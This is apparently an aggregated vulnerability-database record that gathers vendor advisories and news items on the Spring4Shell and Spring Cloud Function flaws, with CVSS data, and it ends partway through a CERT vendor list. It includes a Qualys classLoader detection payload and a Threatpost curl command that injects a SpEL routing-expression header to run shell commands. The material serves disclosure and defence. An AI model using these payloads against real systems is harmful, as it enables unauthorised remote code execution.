\"?class.module.classLoader.resources.context.configFile=http://<Scanner_IP>:<Random_port>&class.module.classLoader.resources.context.configFile\" \n\nQID 730416 is an intrusive check. The payload used in the detection may in some cases change the Spring configuration on the target application which can hamper the application's logging capabilities. \n\n#### Under what conditions would QID 730416 not work? \n\nQID 730416 will not work if the following conditions are present: \n\n * "Do not exclude Intrusive checks" is not enabled in Scan Option Profile \n * This QID only checks for the vulnerability at root URI. If the vulnerability lies in non-root URIs, the QID would not be detected. \n * If communication from host to scanner is blocked. \n * The payload gets blocked by a firewall, IPS, etc. that is between the host and the scanner. \n\n### Updates\n\n**Update \u2013 April **7 \n\nA new QID (730416) was added to address CVE-2022-22963 under \u201cQID Coverage\u201d. \n\n**Update \u2013 April 6** \n\nSeveral new QIDs to address CVE-2022-22963 are now available under \u201cQID Coverage\u201d. The CSAM section has been expanded. \n\n**U****pdate \u2013 April 5****** \n\nGuidance added for detection using Qualys CSAM, VMDR and XDR, and tracking remediation progress using Unified Dashboards and Patch Management. \n\n**Update \u2013 April 4**** ** \n\nQualys has added a [scan utility](<https://github.com/Qualys/spring4scanwin>) for Windows and [scan utility](<https://github.com/Qualys/spring4scanlinux>) for Linux to scan the entire hard drive(s), including archives (and nested JARs,) that indicate the Java application contains a vulnerable Spring Framework or Spring Cloud library. \n\n**Update \u2013 April 1** \n\nNew QIDs to address CVE-2022-22963 are now available. See section \u201cQID Coverage\u201d section. \n\n**Update \u2013 March 31** \n\nCVE-2022-22965 is now assigned to this vulnerability. Qualys Research Team has released QIDs as of March 30 and will keep updating those QIDs as new information is available.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T09:00:00", "type": "qualysblog", "title": "Spring Framework Zero-Day Remote Code Execution (Spring4Shell) Vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-31T09:00:00", "id": "QUALYSBLOG:6DE7FC733B2FD13EE70756266FF191D0", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fortinet": [{"lastseen": "2022-04-28T11:28:54", "description": "Two distinct spring project vulnerabilities where released recently with critical CVSS score and classified as zero-Day attacks. \nThe two vulnerabilities are currently known as : \nCVE-2022-22965 or Spring4Shell: \nA Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. \nhttps://tanzu.vmware.com/security/cve-2022-22965 \n[https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html?fbclid=IwAR2fXxKQjG9vnJiOaXyZ1N_Ypx91TOzO6f48qGZRfKRzinYtD5nUCIptIjg&m=1](<https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html?fbclid=IwAR2fXxKQjG9vnJiOaXyZ1N_Ypx91TOzO6f48qGZRfKRzinYtD5nUCIptIjg&m=1>) \nCVE-2022-22963: \nIn Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing \nfunctionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that \nmay result in access to local resources. \n<https://tanzu.vmware.com/security/cve-2022-22963>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T00:00:00", "type": "fortinet", "title": "CVE-2022-22965 and CVE-2022-22963 vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T00:00:00", "id": "FG-IR-22-072", "href": "https://www.fortiguard.com/psirt/FG-IR-22-072", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "paloalto": [{"lastseen": "2022-04-25T23:29:53", "description": "The Palo Alto Networks Product Security Assurance team has completed its evaluation of the Spring Cloud Function vulnerability CVE-2022-22963 and Spring Core vulnerability CVE-2022-22965 for all products and services. All Palo Alto Networks cloud services with possible impact have been mitigated and remediated.\n\nThe following products and services are not impacted by these Spring vulnerabilities: AutoFocus, Bridgecrew, Cortex Data Lake, Cortex XDR agent, Cortex Xpanse, Cortex XSOAR, Enterprise Data Loss Prevention, Exact Data Matching (EDM) CLI, Expanse, Expedition Migration Tool, GlobalProtect app, IoT Security, Okyo Garde, Palo Alto Networks App for Splunk, PAN-OS hardware and virtual firewalls and Panorama appliances, Prisma Cloud, Prisma Cloud Compute, Prisma SD-WAN (CloudGenix), Prisma SD-WAN ION, SaaS Security, User-ID Agent, WildFire Appliance (WF-500), and WildFire Cloud.\n\n**Work around:**\nNo workarounds or mitigations are required for Palo Alto Networks products at this time.\n\nCustomers with a Threat Prevention subscription can block the attack traffic related to these vulnerabilities by enabling Threat IDs 92393, 92394, and 83239 for CVE-2022-22965 and Threat ID 92389 for CVE-2022-22963.\n\nSee https://unit42.paloaltonetworks.com/cve-2022-22965-springshell/ for more details on Palo Alto Networks product capabilities to protect against attacks that exploit this issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T02:30:00", "type": "paloalto", "title": "Informational: Impact of Spring Vulnerabilities CVE-2022-22963 and CVE-2022-22965", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-31T02:30:00", "id": "PA-CVE-2022-22963", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2022-22963", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:25", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgcabrqTD1UQL7HzljPrvwqXCYkv1djclox3AcQ8Na_vxMGVKwdIvy2QcZ94T6oEON-yCPdjn3NS1gjIhnvO0vhWztDQGuRG-vGMFK-4gF5h-JCwb15c_pE1mTCO9ZQFElckaP6p-wzLgC28Pp1MWGFMwW6ZXK8kjJu7rkmX4n7CbstCx-sROAhbl6t/s728-e100/java-spring-framework.jpg>)\n\nA zero-day remote code execution (RCE) vulnerability has come to light in the Spring framework shortly after a Chinese security researcher [briefly leaked](<https://twitter.com/vxunderground/status/1509170582469943303>) a [proof-of-concept](<https://github.com/tweedge/springcore-0day-en>) (PoC) [exploit](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) on GitHub before deleting their account.\n\nAccording to cybersecurity firm Praetorian, the unpatched flaw impacts Spring Core on Java Development Kit ([JDK](<https://en.wikipedia.org/wiki/Java_Development_Kit>)) versions 9 and later and is a bypass for another vulnerability tracked as [CVE-2010-1622](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>), enabling an unauthenticated attacker to execute arbitrary code on the target system.\n\nSpring is a [software framework](<https://en.wikipedia.org/wiki/Spring_Framework>) for building Java applications, including web apps on top of the Java EE (Enterprise Edition) platform.\n\n\"In certain configurations, exploitation of this issue is straightforward, as it only requires an attacker to send a crafted HTTP request to a vulnerable system,\" researchers Anthony Weems and Dallas Kaman [said](<https://www.praetorian.com/blog/spring-core-jdk9-rce/>). \"However, exploitation of different configurations will require the attacker to do additional research to find payloads that will be effective.\"\n\nAdditional details of the flaw, dubbed \"**SpringShell**\" and \"**Spring4Shell**,\" have been withheld to prevent exploitation attempts and until a fix is in place by the framework's maintainers, Spring.io, a subsidiary of VMware. It's also yet to be assigned a Common Vulnerabilities and Exposures (CVE) identifier.\n\nIt's worth noting that the flaw targeted by the zero-day exploit is different from two previous vulnerabilities disclosed in the application framework this week, including the Spring Framework expression DoS vulnerability ([CVE-2022-22950](<https://tanzu.vmware.com/security/cve-2022-22950>)) and the Spring Cloud expression resource access vulnerability ([CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>)).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhravc9h6Jt8CniALz9rmUeOODWW7XOdJIlvXQbqQkpHJj5wBhPstmROb2bwynD_ugHL4A6E-wxt6DP6LTLoHFp7_ksvQ3j_SdaY4Y7l_XNW3trRxMFhWTLGm3Kju7DTSYzgG4TFLWcIcBi1hChVTWwYbalxyEWYe57BJjxvvGeqT46gjU6bHM1jJYd/s728-e100/whoami.jpg>)\n\nIn the interim, Praetorian researchers are recommending \"creating a ControllerAdvice component (which is a Spring component shared across Controllers) and adding dangerous patterns to the denylist.\"\n\nInitial analysis of the new code execution flaw in Spring Core suggests that its impact may not be severe. \"[C]urrent information suggests in order to exploit the vulnerability, attackers will have to locate and identify web app instances that actually use the DeserializationUtils, something already known by developers to be dangerous,\" Flashpoint [said](<https://www.flashpoint-intel.com/blog/what-is-springshell-what-we-know-about-the-springshell-vulnerability/>) in an independent analysis.\n\nDespite the public availability of PoC exploits, \"it's currently unclear which real-world applications use the vulnerable functionality,\" Rapid7 [explained](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>). \"Configuration and JRE version may also be significant factors in exploitability and the likelihood of widespread exploitation.\"\n\nThe Retail and Hospitality Information Sharing and Analysis Center (ISAC) also [issued a statement](<https://www.rhisac.org/press-release/spring-framework-rce-vulnerability/>) that it has investigated and confirmed the \"validity\" of the PoC for the RCE flaw, adding it's \"continuing tests to confirm the validity of the PoC.\"\n\n\"The Spring4Shell exploit in the wild appears to work against the stock 'Handling Form Submission' sample code from spring.io,\" CERT/CC vulnerability analyst Will Dormann [said](<https://twitter.com/wdormann/status/1509372145394200579>) in a tweet. \"If the sample code is vulnerable, then I suspect there are indeed real-world apps out there that are vulnerable to RCE.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T05:52:00", "type": "thn", "title": "Unpatched Java Spring Framework 0-Day RCE Bug Threatens Enterprise Web Apps Security", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22950", "CVE-2022-22963"], "modified": "2022-03-31T15:27:03", "id": "THN:51196AEF32803B9BBB839D4CADBF5B38", "href": "https://thehackernews.com/2022/03/unpatched-java-spring-framework-0-day.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2022-04-07T11:27:17", "description": "Spring by VMWare has released Spring Cloud Function versions 3.1.7 and 3.2.3 to address remote code execution (RCE) vulnerability CVE-2022-22963 as well as Spring Framework versions 5.3.18 and 5.2.20 to address RCE vulnerability CVE-2022-22965, known as \u201cSpring4Shell.\u201d A remote attacker could exploit these vulnerabilities to take control of an affected system.\n\nAccording to VMware, the Spring4Shell vulnerability bypasses the patch for [CVE-2010-1622](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>), causing CVE-2010-1622 to become exploitable again. The bypass of the patch can occur because Java Development Kit (JDK) versions 9 and later provide two sandbox restriction methods, providing a path to exploit CVE-2010-1622 (JDK versions before 9 only provide one sandbox restriction method).\n\nCISA encourages users and administrators to immediately apply the necessary updates in the Spring Blog posts that provide the [Spring Cloud Function updates addressing CVE-2022-22963](<https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function>) and the [Spring Framework updates addressing CVE-2022-22965](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>). CISA also recommends reviewing VMWare Tanzu Vulnerability Report [CVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+](<https://tanzu.vmware.com/security/cve-2022-22965>) and CERT Coordination Center (CERT/CC) Vulnerability Note [VU #970766](<https://www.kb.cert.org/vuls/id/970766>) for more information. \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/04/01/spring-releases-security-updates-addressing-spring4shell-and>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T00:00:00", "type": "cisa", "title": "Spring Releases Security Updates Addressing \"Spring4Shell\" and Spring Cloud Function Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T00:00:00", "id": "CISA:6CCB59AFE6C3747D79017EDD3CC21673", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/04/01/spring-releases-security-updates-addressing-spring4shell-and", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2022-04-11T19:29:49", "description": " * Spring Framework RCE (Spring4Shell): [CVE-2022-22965](<https://www.cve.org/CVERecord?id=CVE-2022-22965>)\n\nA Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n * Spring Framework DoS: [CVE-2022-22950](<https://www.cve.org/CVERecord?id=CVE-2022-22950>)\n\nn Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.\n\n * Spring Cloud RCE: [CVE-2022-22963](<https://www.cve.org/CVERecord?id=CVE-2022-22963>)\n\nIn Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.\n\nImpact\n\nThere is no impact; F5 products and services and NGINX products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T15:47:00", "type": "f5", "title": "Spring Framework (Spring4Shell) and Spring Cloud vulnerabilities CVE-2022-22965, CVE-2022-22950, and CVE-2022-22963", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-11T17:28:00", "id": "F5:K11510688", "href": "https://support.f5.com/csp/article/K11510688", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2022-03-31T16:29:53", "description": "_NOTE: This post is about the confirmed and patched vulnerability tracked as [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>). While the researchers at Sysdig refer to this Spring Cloud bug as \u201cSpring4Shell,\u201d it should be noted that there is some confusion as to what to call it, with another security firm referring to a different, unconfirmed bug in Spring Core as \u201cSpring4Shell.\u201d To avoid confusion, this post has been amended to take out references to Spring4Shell altogether._\n\nA concerning security vulnerability has bloomed in the Spring Cloud Function, which could lead to remote code execution (RCE) and the compromise of an entire internet-connected host.\n\nSome researchers have noted that because of its ease of exploit and Java-based nature, it\u2019s reminiscent of the [Log4Shell vulnerability](<https://threatpost.com/log4jshell-swarm-vmware-servers-miners-backdoors/179142/>) discovered in December.\n\n\u201c[This] is another in a series of major Java vulnerabilities,\u201d Stefano Chierici, a security researcher at Sysdig, noted in materials shared with Threatpost. \u201cIt has a very low bar for exploitation so we should expect to see attackers heavily scanning the internet. Once found, they will likely install cryptominers, [distributed denial-of-service] DDoS agents, or their remote-access toolkits.\u201d\n\nThe bug ([CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>)) affects versions 3.1.6 and 3.2.2, as well as older, unsupported versions, according to a [Tuesday advisory](<https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function>) from VMware. Users should update to [3.1.7](<https://repo.maven.apache.org/maven2/org/springframework/cloud/spring-cloud-function-context/3.1.7/>) and [3.2.3](<https://repo.maven.apache.org/maven2/org/springframework/cloud/spring-cloud-function-context/3.2.3/>) in order to implement a patch.\n\n## Why Such a Low CVSS Score?\n\nWhile it carries a medium-severity score of 5.4 on the CVSS scale, researchers warned not to underestimate the bug\u2019s impact.\n\n\u201cVMware is using the CVSSv3 base metric \u2018CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L.\u2019 This is underrepresenting the confidentiality, integrity and availability impacts of this vulnerability,\u201d Sysdig researchers Nick Lang and Jason Avery told Threatpost. \u201cThis vulnerability allows an attacker to open a reverse shell in the context of the Spring Cloud service, which may be as root. The impacts are all high and do not require user interaction, which gives this CVE a critical rating.\u201d\n\nThey added, \u201cIn our testing, we verified that user interaction is not required to leverage the CVE-2022-22963 vulnerability to gain unauthorized access.\u201d\n\nSatnam Narang, staff research engineer, Tenable, agrees with the assessment that the CVSS score may not be reflective of the true impact of the issue.\n\n\u201cBecause the vulnerability is considered a remote code execution flaw that can be exploited by an unauthenticated attacker, it appears that the CVSSv3 score might not reflect the actual impact of this flaw,\u201d he said via email.\n\nPaul Ducklin, principle research scientist at Sophos, noted that it alarmingly allows for \u201cinstant RCE.\u201d\n\n\u201cMy recommendation is simple, and doesn\u2019t need a score: Patch against CVE-2022-22693 because it\u2019s attracting lots of interest, and proof-of-concept code is readily available, so why be behind when you could so easily be ahead?\u201d he told Threatpost.\n\n## **Widescale Consequences Set to Sprout**\n\nSpring Cloud is an open-source microservices framework: A collection of ready-to-use components which are useful in building distributed applications in an enterprise. It\u2019s [widely used across industries](<https://spring.io/projects/spring-cloud>) by various companies and includes ready-made integration with components from various app providers, including Kubernetes and Netflix.\n\nAs such, its footprint is concerning, according to Sysdig.\n\n\u201cSpring is\u2026used by millions of developers using Spring Framework to create high-performing, easily testable code,\u201d Chierici said. \u201cThe Spring Cloud Function framework allows developers to write cloud-agnostic functions using Spring features. These functions can be stand-alone classes and one can easily deploy them on any cloud platform to build a serverless framework.\u201d\n\nHe added, \u201cSince Spring Cloud Function can be used in Cloud serverless functions like AWS lambda or Google Cloud Functions, those functions might be impacted as well\u2026leading the attackers inside your cloud account.\u201d\n\n## **The CVE-2022-22963 Bug in Bloom**\n\nAccording to Sysdig, the vulnerability can be exploited over HTTP: Just like Log4Shell, it only requires an attacker to send a malicious string to a Java app\u2019s HTTP service.\n\n\u201cUsing routing functionality, it is possible for a user to provide a specially crafted Spring Expression Language (SpEL) as a routing-expression to access local resources and execute commands in the host,\u201d Chierici explained. \u201cThe issue with CVE-2022-22963 is that it permits using HTTP request header spring.cloud.function.routing-expression parameter and SpEL expression to be injected and executed through StandardEvaluationContext.\u201d\n\nAs such, unfortunately, an exploit is \u201cquite easy to accomplish\u201d using a simple curl command he noted:\n\n_curl -i -s -k -X $\u2019POST\u2019 -H $\u2019Host: 192.168.1.2:8080\u2032 -H $\u2019spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\\\u201dtouch /tmp/test\u201d)\u2019 \u2013data-binary $\u2019exploit_poc\u2019 $\u2019http://192.168.1.2:8080/functionRouter\u2019_\n\n_<CURL>_\n\nSysdig published a PoC exploit on its GitHub page, and as noted, others are circulating.\n\n\u201cThe PoCs we\u2019ve seen so far have all simply popped up a calculator app, that being more than enough to prove the point, but it looks as though any command already installed on the server could easily be launched,\u201d [noted Ducklin](<https://nakedsecurity.sophos.com/2022/03/30/vmware-spring-cloud-java-bug-gives-instant-remote-code-execution-update-now/>), who refers to the bug as the \u201cSpring Expression Resource Access Vulnerability\u201d or \u201cSPEL Vulnerability.\u201d\n\nHe added, \u201cThis includes remotely triggering web downloader programs such as curl, launching command shells such as bash, or indeed doing both of those in sequence as a way of quietly and quickly implanting malware.\u201d\n\n## **Weeding Out Compromises**\n\nAfter applying the patch, anyone using applications built using Spring Cloud should take a careful inventory of their installations to make sure compromise hasn\u2019t already occurred, according to Sysdig.\n\n\u201cEven though you might have already upgraded your library or applied one of the other mitigations on containers affected by the vulnerability, you need to detect any exploitation attempts and post-breach activities in your environment,\u201d Chierici said.\n\nThat detection can be done via image scanners or a runtime detection engine to suss out malicious behaviors in already-deployed hosts or pods, he noted.\n\n\u201cThe best defense for this type of vulnerability is to patch as soon as possible,\u201d according to Sysdig\u2019s writeup. \u201cHaving a clear understanding of the packages being used in your environment is a must in today\u2019s world.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T18:04:11", "type": "threatpost", "title": "RCE Bug in Spring Cloud Could Be the Next Log4Shell, Researchers Warn", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22693", "CVE-2022-22963"], "modified": "2022-03-30T18:04:11", "id": "THREATPOST:D7D5E283A1FBB50F8BD8797B0D60A622", "href": "https://threatpost.com/critical-rce-bug-spring-log4shell/179173/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2022-05-19T17:43:45", "description": "### Overview\n\nThe Spring Framework insecurely handles PropertyDescriptor objects, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\nThe [Spring Framework](<https://spring.io/>) is a Java framework that can be used to create applications such as web applications. Due to improper handling of PropertyDescriptor objects used with data binding, Java applications written with Spring may allow for the execution of arbitrary code.\n\nExploit code that targets affected WAR-packaged Java code for tomcat servers is publicly available.\n\nNCSC-NL has a [list of products and their statuses](<https://github.com/NCSC-NL/spring4shell/blob/main/software/README.md>) with respect to this vulnerability.\n\n### Impact\n\nBy providing crafted data to a Spring Java application, such as a web application, an attacker may be able to execute arbitrary code with the privileges of the affected application. Depending on the application, exploitation may be possible by a remote attacker without requiring authentication.\n\n### Solution\n\n#### Apply an update\n\nThis issue is addressed in Spring Framework 5.3.18 and 5.2.20. Please see the [Spring Framework RCE Early Announcement](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) for more details.\n\n### Acknowledgements\n\nThis issue was publicly disclosed by heige.\n\nThis document was written by Will Dormann\n\n### Vendor Information\n\n970766\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Blueriq __ Affected\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.blueriq.com/en/insights/measures-cve22950-22963-22965>\n\n### BMC Software __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-06 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://bmcsites.force.com/casemgmt/sc_KnowledgeArticle?sfdcid=000395541>\n\n### Cisco __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 07, 2022**\n\n**CVE-2022-22965**| Affected 